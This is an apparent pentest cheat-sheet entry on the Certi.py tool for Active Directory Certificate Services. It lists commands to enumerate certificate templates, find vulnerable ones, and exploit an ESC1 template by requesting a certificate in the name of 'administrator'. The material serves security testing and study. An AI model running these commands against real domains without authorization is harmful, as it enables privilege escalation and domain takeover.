Certi
Certi.py can be leveraged with any set of credentials (or TGT) on an Active Directory domain to enumerate AD CS information from a remote Linux host.
Setup
Listing all Certificate Templates
-- python3 certi.py list domain.local/user:pass
Listing all Vulnerable Certificate Templates
-- python3 certi.py list domain.local/user:pass -vuln
Enrolling in a Certificate Template Vulnerable to ESC1
-- python3 certi.py req domain.local/[email protected] <CA Service Name> -k -n -alt-name administrator -template <vulnerable template>
Last updated